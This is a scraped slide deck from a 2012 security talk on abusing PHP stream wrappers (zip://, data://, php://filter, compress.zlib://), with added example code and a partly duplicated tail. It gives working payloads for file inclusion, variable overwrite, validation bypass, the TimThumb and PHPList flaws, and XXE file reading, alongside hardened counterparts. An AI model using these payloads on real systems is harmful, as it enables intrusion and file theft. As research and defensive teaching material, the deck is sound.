PHP Wrappers

Aleksey Moskvin
Positive Technologies
May 2012
Streams and wrappers

Data reading
$contents = '';
$handle = fopen($file, "rb");
while (!feof($handle))
{
    $contents .= fread($handle, 8192);
}
fclose($handle);



You can get data not only from local files:

$file = 'ftp://user:password@10.0.0.1/pub/file.txt';

$file = 'http://127.0.0.1/server-status';

$file = 'php://fd/XXX';

$file = 'expect://ls';
Data writing

Read a file by copying it to the output stream:

copy('/etc/passwd', 'php://output');

file_put_contents('php://output', file_get_contents('/etc/hosts'));


Modify a file on the fly, then write it to disk:

move_uploaded_file($_FILES["attach"]["tmp_name"],
                   "php://filter/string.rot13/resource=./upload/user_attach");


Write data into the Apache error_log (PHP >= 5.3.6, where php://fd appeared):

error_log('Bypass root perm!', 3, 'php://fd/2');
Wrapper zip://

Requirements: PHP is compiled with zip support.

The zip:// wrapper is a local wrapper, so it works even when allow_url_fopen = Off.

The zip:// wrapper gives access to a file inside an archive whose name is arbitrary (no .zip extension is needed).

$zip = new ZipArchive;

if ($zip->open('/tmp/any_name_zip_arxiv', ZipArchive::CREATE) === true)
{
    $zip->addFromString('/my/header.html', '<?php print_r(ini_get_all());');
}
$zip->close();

print file_get_contents('zip:///tmp/any_name_zip_arxiv#/my/header.html');
NULL Byte Replacement

$s = $_POST['path'];
include $s.'/header.html';

The allow_url_include directive restricts the use of the http://, ftp:// and data:// wrappers in includes.

The magic_quotes_gpc directive escapes the NULL byte, which blocks the classic "%00" truncation of the appended suffix in local file inclusion.

If you can create a zip archive on the server, the zip:// wrapper replaces the NULL byte: the fixed suffix simply becomes a path inside the archive:

path=zip:///tmp/any_name_zip_arxiv#/my

This works even when allow_url_fopen=Off and magic_quotes_gpc=On.

Because the archive name is arbitrary, the temporary files created during a file upload can serve as the archive.

Use phpinfo() to get the temporary file path:
https://rdot.org/forum/showthread.php?t=1134
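The following is an added example, not code from the slides: it builds an archive the way the zip:// slide does, then reaches the file inside it through the exact `$s.'/header.html'` include pattern above, and also shows the limitation noted at the end of the deck, namely that file_exists() on the same zip:// path returns false, so an existence check in front of the include would stop this. The archive path comes from tempnam(), the entry name /my/header.html is the slide's, and the helper names are mine. It needs ext/zip.

```php
<?php
// Added example (not from the slides): zip:// as a NULL-byte replacement.
// Assumptions: ext/zip is loaded; the archive lives in the system temp dir.

function build_archive(string $zipPath): bool
{
    $zip = new ZipArchive();
    // OVERWRITE: tempnam() already created an empty file, which is not a zip.
    if ($zip->open($zipPath, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== true) {
        return false;
    }
    // Same entry name as the slide; the code inside just reports where it ran.
    $zip->addFromString('/my/header.html', "<?php return 'executed from inside the archive';");
    return $zip->close();
}

function include_through_zip(string $zipPath): array
{
    // What the vulnerable page receives as $_POST['path']: everything before
    // the fixed '/header.html' suffix is attacker-controlled.
    $s      = 'zip://' . $zipPath . '#/my';
    $target = $s . '/header.html';

    $exists   = file_exists($target);   // zip:// has no stat() support: false
    $returned = include $target;        // ... but include runs the entry anyway

    return ['file_exists' => $exists, 'include_result' => $returned];
}

$zipPath = tempnam(sys_get_temp_dir(), 'arxiv');   // no .zip extension needed
if (build_archive($zipPath)) {
    var_dump(include_through_zip($zipPath));
    // ["file_exists"]    => bool(false)
    // ["include_result"] => "executed from inside the archive"
}
unlink($zipPath);
```

Because zip:// is flagged as a local wrapper, the include does not need allow_url_include; only a file_exists()/is_file() guard, or a realpath() check that rejects anything that is not a plain file, would catch it.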
Wrapper data:// (RFC 2397)

According to RFC 2397, a data: URL has the following syntax:

dataurl   := "data:" [ mediatype ] [ ";base64" ] "," data
mediatype := [ type "/" subtype ] *( ";" parameter )
data      := *urlchar
parameter := attribute "=" value

Wrapper feature: the mediatype may be absent, and type, subtype and the parameters may hold arbitrary values:

data://anytype/anysubtype;myattr!=V@l!;youattr?=Op$;base64
Trick: function stream_get_meta_data

The parameters of a data: URL become items of the array returned by stream_get_meta_data, so code that extract()s that array lets the attacker define variables:

$password = 'secret';
$file = $_POST['file'];
$fp = fopen($file, 'r');
extract(stream_get_meta_data($fp));
if ($mediatype === 'text/plain') { ... }
if ($_COOKIE['admin'] === $password) { ... }

Overwrite the $password variable:
POST DATA: file=data://text/plain;password=mysecret;base64,

Bypass the authorization check:
Cookie: admin=mysecret
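As an added example (not code from the slides), the payload above is run against a helper that mirrors the vulnerable snippet, followed by a reader that refuses every wrapper. The helper names are mine; the data: URL is the slide's.

```php
<?php
// Added example (not from the slides). First the slide's payload against a
// helper that mirrors the vulnerable code, then a reader that refuses every
// wrapper. Helper names are mine; the data: URL is the one from the slide.

function meta_of(string $url): array
{
    $fp = @fopen($url, 'r');
    if ($fp === false) {
        return [];
    }
    $meta = stream_get_meta_data($fp);
    fclose($fp);
    return $meta;
}

// Every ";attr=value" in the mediatype part is copied into the returned array,
// next to the standard keys, which is exactly what extract() then exports.
$meta = meta_of('data://text/plain;password=mysecret;base64,');
var_dump($meta['mediatype']);     // string(10) "text/plain"
var_dump($meta['password']);      // string(8) "mysecret"  -> would replace $password
var_dump($meta['wrapper_type']);  // string(7) "RFC2397" : the data: wrapper's label

// Hardened reader: resolve to a real path under a base directory before
// opening, and never extract() stream metadata. realpath() returns false
// for every wrapper URL, so zip://, data://, php://filter etc. all fail here.
function open_plain_file(string $baseDir, string $name)
{
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;
    }
    $fp = fopen($real, 'r');
    // Belt and braces: the stream must come from the plain-file wrapper.
    if ($fp !== false && stream_get_meta_data($fp)['wrapper_type'] !== 'plainfile') {
        fclose($fp);
        return false;
    }
    return $fp;
}

var_dump(open_plain_file(sys_get_temp_dir(), 'data://text/plain;password=x;base64,')); // bool(false)
var_dump(open_plain_file(sys_get_temp_dir(), '../../etc/passwd'));                     // bool(false)
```

The realpath() step rejects both wrapper URLs and traversal in one go; the wrapper_type check costs nothing and documents the intent for the next reader of the code.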
Wrapper compress.zlib://

The compress.zlib:// wrapper passes an ordinary (uncompressed) file through unchanged:

readfile('compress.zlib:///etc/hosts');

The local path can contain arbitrary directory names, because PHP collapses the ".." lexically before opening the file, so the bogus directory need not exist:

$url = 'compress.zlib:///http://../etc/hosts';
if (preg_match('#http://#', $url) == true)
{
    echo "Yes!";
}
Any Data in parse_url

The parse_url function handles not only URLs:

$src = $_POST['src'];
$url_info = parse_url($src);

if ($url_info['host'] === 'img.youtube.com')
{
    $name = str_replace('/', '', substr($url_info['path'], 4));
    copy($src, './'.$name);
}

Intended use, loading images from img.youtube.com:
POST DATA: src=http://img.youtube.com/vi/Uvwfxki7ex4/0.jpg

Bypass the host name check and create a file with arbitrary content (here ./my.php):
POST DATA: src=data://img.youtube.com/aaamy.php?;base64,SSBsb3ZlIFBIUAo

Local file manipulation (the "host" is just a directory name that ".." walks out of):
POST DATA: src=compress.zlib://img.youtube.com/../path/to/local/file
Bypassing preg_match validation

Filter bypass for checks based on an unanchored preg_match: the pattern only has to match somewhere inside the string, so the "http://" can sit in a data: parameter or in a bogus directory name:

POST DATA: src=data://text/plain;charset=http://w?param=anyval;base64,SSBsb3ZlIFBIUAo

POST DATA: src=compress.zlib://youtube.com/../http://?/../../path/to/local/file

function validate_url ($url)
{
    $pattern =
        "/\b(?:(?:https?):\/\/|www\.)[-a-z0-9+&@#\/%?=~_|!:,.;]*[-a-z0-9+&@#\/%=~_|]/i";
    return preg_match ($pattern, $url);
}

$src = $_POST['src'];

if (!validate_url ($src)) display_error ('invalid url');
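The following added example (not from the slides) serves both the parse_url slide and this one: it shows what parse_url() and the slide's regex make of the five src= values above, next to a check that rejects all but the legitimate one. The regex is the slide's with its escaping restored; the hardened function and its name are mine.

```php
<?php
// Added example (not from the slides): what parse_url() and the slide's
// regex make of the src= values above, next to a check that rejects them.
// The regex is the slide's with its escaping restored; everything else is mine.

function validate_url_slide(string $url): int
{
    $pattern = "/\b(?:(?:https?):\/\/|www\.)[-a-z0-9+&@#\/%?=~_|!:,.;]*[-a-z0-9+&@#\/%=~_|]/i";
    return preg_match($pattern, $url);   // unanchored: "http://" anywhere is enough
}

function is_allowed_image_url(string $url, array $allowedHosts): bool
{
    $u = parse_url($url);
    if ($u === false || !isset($u['scheme'], $u['host'])) {
        return false;
    }
    // Anchor on the scheme: this is what kills data:, compress.zlib:, php:, zip:, ftp: ...
    if (!in_array(strtolower($u['scheme']), ['http', 'https'], true)) {
        return false;
    }
    if (!in_array(strtolower($u['host']), $allowedHosts, true)) {
        return false;
    }
    // Keep ".." out of the path; store the result with basename() on top of this.
    return strpos($u['path'] ?? '', '..') === false;
}

$payloads = [
    'http://img.youtube.com/vi/Uvwfxki7ex4/0.jpg',                              // #1 legitimate
    'data://img.youtube.com/aaamy.php?;base64,SSBsb3ZlIFBIUAo',                  // #2 host check bypass
    'compress.zlib://img.youtube.com/../path/to/local/file',                     // #3 local file
    'data://text/plain;charset=http://w?param=anyval;base64,SSBsb3ZlIFBIUAo',    // #4 regex bypass
    'compress.zlib://youtube.com/../http://?/../../path/to/local/file',          // #5 regex bypass
];

foreach ($payloads as $src) {
    $u = parse_url($src);
    printf("regex=%d strict=%d scheme=%-13s host=%-16s %s\n",
        validate_url_slide($src),
        (int) is_allowed_image_url($src, ['img.youtube.com']),
        $u['scheme'] ?? '-', $u['host'] ?? '-', $src);
}
// regex=1 for #1, #4 and #5 (0 for #2 and #3, which is why #4 and #5 exist);
// strict=1 for #1 only; #1, #2 and #3 all report host=img.youtube.com.
```

The two checks fail for different reasons: parse_url() faithfully reports a host for any scheme, and the regex never looks at where in the string "http://" occurs. Whitelisting the scheme first removes every wrapper from consideration before the host is even compared.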
Arbitrary File Loading in TimThumb

TimThumb is a popular script used for image resizing.
Public exploit for v1.32 (08/2011): http://www.exploit-db.com/exploits/17602
New wrappers exploit for v1.34 (revision 145):

function check_external ($src) {
    …………………
    if (!validate_url ($src)) display_error ('invalid url');
    $url_info = parse_url ($src);
    ...................
    if ($url_info['host'] == 'www.youtube.com' || …) parse_str($url_info['query']);
    ..................
    $fh = fopen($local_filepath, 'w');
    $ch = curl_init($src);
    …………………..
    $file_infos = getimagesize ($local_filepath);

    if (empty($file_infos['mime']) || …..) unlink($local_filepath);
    ………………………………

parse_str() without a second argument writes the query parameters into the current scope, so the query string of a "youtube" URL overwrites $local_filepath and $url_info:

http://www.youtube.com/?local_filepath=php://filter/resource%3D./path/to/.php&url_info[host]=img.youtube.com&src=http://mysite.com/thumb.txt
File Manipulation in TimThumb v1.35

Requirements: the curl_init function is disabled on the target server, so TimThumb falls back to file_get_contents:

…………………
if (!$img = file_get_contents ($src)) {
    display_error ('error....');
}
if (file_put_contents ($local_filepath, $img) == FALSE)
{
    display_error ('error.....');
}
…………………

Create a file with arbitrary content:
data://img.youtube.com/e;charset=http://w?&var=;base64,SSBsb3ZlIFBIUAo

"Read" a local file (its content is written to $local_filepath):
compress.zlib://youtube.com/../http://?/../../path/to/local/file
Secret features of the php://filter wrapper

php://filter lets you apply stream filters to a stream while opening it.

Filter the file content on read:

readfile('php://filter/read=string.toupper|anyfilter|string.rot13/resource=./file.php');

An unknown filter name (anyfilter above) only produces a warning and does not influence the results of the other filters.

The convert.base64-decode and string.strip_tags filters can delete data from the stream.

Stefan Esser used this property of convert.base64-decode in an exploit for Piwik in 2009:
http://sektioneins.de/en/advisories/advisory-032009-piwik-cookie-unserialize-vulnerability

Since 2009, two important questions have remained open:
    How to delete "unused" data?
    What are the advantages of filters?
Base64 algorithm: encoding

RFC 2045, section 6.8 describes the Base64 algorithm.

Base64 alphabet:
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

Base64 algorithm: decoding

While decoding, only characters of the Base64 alphabet are handled; every other character is skipped.

The input string is divided into groups of 4 characters, and every group is decoded separately into 3 bytes.
Example: removing a stopper

You can delete data by applying base64 decoding several times.

$content = "; <? die; ?>\n";
$content .= "[/Ly8vVTFOQ1RXSXpXbXhJUmtKSlZVRTlQUT09]\n";
$file = 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode'
      . '/resource=./PoC';
file_put_contents($file, $content);

"Stub": /Ly8v (base64_decode('Ly8v') == '///'). The leading "/" completes the 4-character group that the three alphabet characters of "die" start, so the real payload is decoded on a group boundary.

The convert.base64-decode filter does not handle strings with an equal sign in the middle:

$s = 'php://filter/read=convert.base64-decode/resource=data:,dGVzdA==CRAP';
var_dump(file_get_contents($s)); // prints: string(0) ""
Filter string.strip_tags

The string.strip_tags filter speeds up the "extrusion" process:

$content = "; <? die; ?>\n";
$content .= "=3C=3Fprint('PHP');\n";
$file = 'php://filter/write=string.strip_tags|convert.quoted-printable-decode/resource=./PoC';
file_put_contents($file, $content);

The convert.quoted-printable-decode filter handles the string character by character. Characters in Quoted-Printable format (RFC 2045, section 6.7) are turned into characters of the 8-bit code page.

Conversion into Quoted-Printable format:

$quoted_printable_lt = '='.strtoupper(dechex(ord('<'))); // =3C

The convert.quoted-printable-decode filter fails if the string contains an equal sign that is not followed by a two-digit hexadecimal character code:

$s = 'php://filter/read=convert.quoted-printable-decode/resource=data:,dGVz=CRAP';
var_dump(file_get_contents($s)); // prints: string(0) ""
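The following added example (not code from the slides) serves both the base64 slide and this one: it pushes the two stopper payloads through the same php://filter/write= chains into a temp file and returns what actually reached the disk. The stopper text and both stubs are the slide's own values; the helper names are mine.

```php
<?php
// Added example (not code from the slides): push the two "stopper" payloads
// above through the same php://filter/write= chains, into a temp file, and
// return what actually reached the disk.

function write_through_filters(string $filters, string $content): string
{
    $path = tempnam(sys_get_temp_dir(), 'poc');
    file_put_contents("php://filter/write={$filters}/resource={$path}", $content);
    $onDisk = file_get_contents($path);
    unlink($path);
    return $onDisk;
}

// 1) Three convert.base64-decode passes. "; <? die; ?>", "[", "]" and the
//    newlines are outside the base64 alphabet and are dropped. "die" plus the
//    "/" of the stub form one 4-character group; "Ly8v" decodes to "///", which
//    on the next pass absorbs the one alphabet byte ("v") that decoding "die/"
//    leaves behind, so the real payload stays aligned on every pass.
function base64_stopper_removal(): string
{
    $content  = "; <? die; ?>\n";
    $content .= "[/Ly8vVTFOQ1RXSXpXbXhJUmtKSlZVRTlQUT09]\n";
    $chain = 'convert.base64-decode|convert.base64-decode|convert.base64-decode';
    return write_through_filters($chain, $content);
}

// 2) string.strip_tags drops "<? die; ?>" as a PHP tag but leaves the
//    quoted-printable escapes alone; convert.quoted-printable-decode then
//    restores "<?" in the next filter stage. string.strip_tags was deprecated
//    in PHP 7.3 and is no longer available in PHP 8, where the unknown filter
//    is skipped and the stopper survives; run this half on an older interpreter.
function strip_tags_stopper_removal(): string
{
    $qpLt = '=' . strtoupper(dechex(ord('<')));   // =3C
    $qpQm = '=' . strtoupper(dechex(ord('?')));   // =3F
    $content  = "; <? die; ?>\n";
    $content .= "{$qpLt}{$qpQm}print('PHP');\n";
    return write_through_filters('string.strip_tags|convert.quoted-printable-decode', $content);
}

var_dump(base64_stopper_removal());      // string(10) "I Love PHP"
var_dump(strip_tags_stopper_removal());  // "; \n<?print('PHP');\n" (PHP < 8)
```

The first chain is the important one for current PHP: it depends only on convert.base64-decode skipping non-alphabet bytes, so the junk bytes each pass produces disappear on the next one, and the stopper that a file-writing sink prepends never reaches the file.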
TextPattern: Upload Arbitrary Files (I)

A file with a .php extension stores information about comment authors:

$file = $prefs['tempdir'].DS.'evaluator_trace.php';
if (!file_exists($file)) {
    $fp = fopen($file, 'wb');
    if ($fp)
        fwrite($fp, "<?php return; ?>\n".
            "This trace-file tracks saved comments. (created ".
            safe_strftime($prefs['archive_dateformat'],time()).")\n".
            "Format is: Type; Probability; Message " .
            "(Type can be -1 => spam, 0 => moderate, 1 => visible)\n\n");
Partial File Reading in PHPList <= 2.10.13

The cause is the possibility to modify the structure of the $_FILES array:
http://isisblogs.poly.edu/2011/08/11/php-not-properly-checking-params/

if (is_array($_FILES)) { ## only avatars are files
    foreach ($_FILES['attribute']['name'] as $key => $val) {
        if (!empty($_FILES['attribute']['name'][$key])) {
            $tmpnam = $_FILES['attribute']['tmp_name'][$key];
            $size = $_FILES['attribute']['size'][$key];
            if ($size < MAX_AVATAR_SIZE) {
                $avatar = file_get_contents($tmpnam);
                Sql_Query(sprintf('replace into %s (userid,attributeid,value)
                    values(%d,%d,"%s")',$tables["user_attribute"],$id,$key,base64_encode($avatar)));

The following HTML form lets an attacker read a local file into the database: the malformed field names make PHP build a $_FILES structure in which tmp_name is attacker-controlled.

<form action="http://localhost/lists/admin/?page=user&id=1" method="POST"
      enctype="multipart/form-data" >
<input type="file" name="attribute[tmp_name][">
<input type="file" name="attribute[size][">
<input type="file" name="attribute[[tmp_name]">
<input type="file" name="attribute[name][">
<input name="change" value="Save Changes" type="submit">
</form>

getimagesize check bypass (I)

With filters you can not only delete stoppers but also modify images that are validated with getimagesize.

If you manage to inject data into the EXIF segment of the image
getimagesize check bypass (II)

extract($_REQUEST);
…..
include $templatedir.'/header.html';
.....
if (!empty($_FILES) ) {
    $file_info = getimagesize($_FILES['image']['tmp_name']);
    if($file_info['mime'] == 'image/jpeg')
    {
        if ( move_uploaded_file( $_FILES['image']['tmp_name'], $folder.'/avatar.jpg') )
......

Upload an image that passes getimagesize, but make a zip archive containing /my/header.html end up on the server: the write filter chain discards the image bytes and decodes the base64-encoded archive hidden in the image (the EXIF data from the previous slide):

folder=php://filter/write=string.strip_tags|convert.base64-decode/resource=/tmp/

Then include the file from the zip archive:

templatedir=zip:///tmp/avatar.jpg#/my
Files with arbitrary content

If you manage to create a file with arbitrary content, you can:

    create a session file and exploit an unserialize bug via session_start();

    create a zip archive and exploit RFI;

    create or rewrite .htaccess / .htpasswd files;

    create or rewrite templates.
parse_ini_file attack

The parse_ini_file function handles local files only, but php://filter counts as local:

session_start();
$_SESSION['admin'] = $_POST['name'];
.......
$var = parse_ini_file($inifile);
require $var['require'];

Create a session file /tmp/sess_dffdsdf24gssdgsd90 with the payload as the "admin" value:

admin|s:68:"Ly8vVnpOYWFHTnNNRXRqYlZaNFpGZHNlVnBVTUdsTU1sWXdXWGs1YjJJelRqQmplVWs5"

With filters, transform the session file into a format parse_ini_file accepts: three base64 decodes turn the line above into INI text whose require key points at a file of the attacker's choice (the value above yields require="/etc/hosts"):

php://filter/read=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=/tmp/sess_dffdsdf24gssdgsd90
XXE Attack

Read files via XML injection. The entity points at a php://filter URL, so the target is base64-encoded and survives the XML parse even if it contains markup or binary data:

<?xml version='1.0'?>
<!DOCTYPE scan
 [
   <!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=http://127.0.0.1/server-status">
 ]>
<scan>&test;</scan>

The simplexml_load_file function and the DOMDocument::load method support wrappers: libxml fetches external entities through PHP's stream layer.
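As an added example (not from the slides), the payload above run locally: the entity points at a temp file this script creates, a stand-in for http://127.0.0.1/server-status, so it works offline. The helper name and the sample file content are mine.

```php
<?php
// Added example (not from the slides): the XXE payload above run locally.
// The entity points at a temp file this script creates (a stand-in for
// http://127.0.0.1/server-status). The php://filter base64 step is what keeps
// bytes that are not well-formed XML from aborting the parse.

libxml_use_internal_errors(true);

function xxe_read(string $target, bool $resolveEntities): string
{
    $xml = "<?xml version='1.0'?>\n"
         . "<!DOCTYPE scan [\n"
         . "  <!ENTITY test SYSTEM \"php://filter/read=convert.base64-encode/resource={$target}\">\n"
         . "]>\n"
         . "<scan>&test;</scan>";

    // LIBXML_NOENT is the dangerous flag: it makes libxml fetch and substitute
    // external entities, and in PHP that fetch goes through the stream wrappers.
    $doc = simplexml_load_string($xml, 'SimpleXMLElement', $resolveEntities ? LIBXML_NOENT : 0);
    return $doc === false ? '' : (string) $doc;
}

$secret = tempnam(sys_get_temp_dir(), 'xxe');
file_put_contents($secret, "root:x:0:0:root:/root:/bin/bash\n");   // constructed sample

$leaked = xxe_read($secret, true);
var_dump(base64_decode($leaked) === file_get_contents($secret));   // bool(true): file read
var_dump(xxe_read($secret, false));                                // "" : entity left unresolved
unlink($secret);
```

The fix is the second call: never pass LIBXML_NOENT (or LIBXML_DTDLOAD) on untrusted input, and on PHP older than 8.0 additionally call libxml_disable_entity_loader(true) before parsing.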
Limitations for the usage of wrappers

With Suhosin installed you are by default not allowed to use wrappers in includes (even if allow_url_include = On).

A wrapper becomes usable in includes only once it is whitelisted; for example, for zip://:

suhosin.executor.include.whitelist = "zip"

The file_exists, is_file and filesize functions return FALSE when a php://filter, zip:// or data:// URL is used as the file name, so an existence check placed before the include or read stops these wrappers.
Thank you for your attention!

Questions?
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 

Recently uploaded (20)

Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 

On secure application of PHP wrappers

6. NULL Byte Replacement

$s = $_POST['path'];
include $s.'/header.html';

The allow_url_include directive blocks the http://, ftp:// and data:// wrappers in include.
The magic_quotes_gpc directive escapes the NULL byte, so the classic null-byte truncation of the appended '/header.html' no longer works.

If you can create a zip archive, you can use the zip:// wrapper instead; the '#' fragment selects the file inside the archive and the appended '/header.html' completes its name:

path=zip:///tmp/any_name_zip_arxiv#/my

This works even if allow_url_fopen=Off and magic_quotes_gpc=On.

Because the archive may have an arbitrary name, a temporary file created while content is uploaded can serve as the archive. phpinfo() shows the tmp_name of an uploaded file, which gives you the temporary file path:
https://rdot.org/forum/showthread.php?t=1134
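An added example (not the slides' own code): the include from this slide next to a hardened version that never lets user input select a stream wrapper. The template directory layout (templates/<name>/header.html), the template names and the $_POST field are assumptions.

```php
<?php
// Added example, not code from the slides. Assumptions: templates live under
// ./templates/<name>/header.html and the user picks <name> via $_POST['path'].

// As on the slide: $_POST['path'] can be zip:///tmp/any_name_zip_arxiv#/my,
// php://filter/..., data:... and include will honour the wrapper.
function vulnerable_include(string $path): void
{
    include $path . '/header.html';
}

// Hardened: map the user's choice to a file inside a fixed directory.
function resolve_template(string $name, string $baseDir): ?string
{
    // 1. A template name is a bare identifier: no "scheme:", no "/", no NUL byte,
    //    so neither a wrapper nor a traversal sequence can be smuggled in.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }
    // 2. realpath() only resolves real local paths; it returns false for
    //    wrappers (zip://, php://filter, data:) and for files that do not exist.
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $name . DIRECTORY_SEPARATOR . 'header.html');
    if ($base === false || $full === false) {
        return null;
    }
    // 3. Containment: the resolved file must still be under the template root
    //    (a symlink inside templates/ that points elsewhere fails here).
    $root = $base . DIRECTORY_SEPARATOR;
    if (strncmp($full, $root, strlen($root)) !== 0) {
        return null;
    }
    return $full;
}

function safe_include(string $name, string $baseDir): bool
{
    $file = resolve_template($name, $baseDir);
    if ($file === null) {
        return false;
    }
    include $file;
    return true;
}

// Constructed inputs: a legitimate name plus the payloads from the slides.
$inputs = [
    'default',
    'zip:///tmp/any_name_zip_arxiv#/my',
    'php://filter/read=convert.base64-encode/resource=/etc/passwd',
    '../../etc',
    "default\0",
];
foreach ($inputs as $in) {
    $r = resolve_template($in, __DIR__ . '/templates');
    printf("%-60s => %s\n", addcslashes($in, "\0"), $r ?? 'rejected');
}
```

Only 'default' can ever resolve, and only if templates/default/header.html exists next to the script; every wrapper, traversal and NUL-byte variant is rejected by the identifier check before realpath() is even consulted.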
7. Wrapper data:// (RFC 2397)

According to RFC 2397, a data: URL has a more flexible syntax than the usual data:text/plain;base64,... form:

dataurl   := "data:" [ mediatype ] [ ";base64" ] "," data
mediatype := [ type "/" subtype ] *( ";" parameter )
data      := *urlchar
parameter := attribute "=" value

Wrapper feature: the mediatype can be absent, or it can be filled with arbitrary values:

data://anytype/anysubtype;myattr!=V@l!;youattr?=Op$;base64
8. Trick: function stream_get_meta_data

The array returned by stream_get_meta_data() contains the parameters of a data: URL, so they can overwrite variables when the array is passed to extract():

$password = 'secret';
$file = $_POST['file'];
$fp = fopen($file, 'r');
extract(stream_get_meta_data($fp));
if ($mediatype === 'text/plain') { ... }
if ($_COOKIE['admin'] === $password) { ... }

Rewrite the $password variable:
POST DATA: file=data://text/plain;password=mysecret;base64,

Bypass authorization:
Cookie: admin=mysecret
9. Wrapper compress.zlib://

The compress.zlib:// wrapper does not modify the content of an ordinary (uncompressed) file:

readfile('compress.zlib:///etc/hosts');

The local file path can include arbitrary folder names, as the .. component removes the non-existent http:/ directory before the file is opened; a check that only looks for http:// in the string is satisfied while a local file is read:

$url = 'compress.zlib:///http://../etc/hosts';
if (preg_match('#http://#', $url) == true) { echo "Yes!"; }
10. Any Data in parse_url

The parse_url function handles not only URLs:

$src = $_POST['src'];
$url_info = parse_url($src);
if ($url_info['host'] === 'img.youtube.com') {
    $name = str_replace('/', '', substr($url_info['path'], 4));
    copy($src, './'.$name);
}

Loading images from img.youtube.com:
POST DATA: src=http://img.youtube.com/vi/Uvwfxki7ex4/0.jpg

Bypass the host name check and create arbitrary files (parse_url reports img.youtube.com as the host of the data: URL, and substr($path, 4) of /aaamy.php yields my.php):
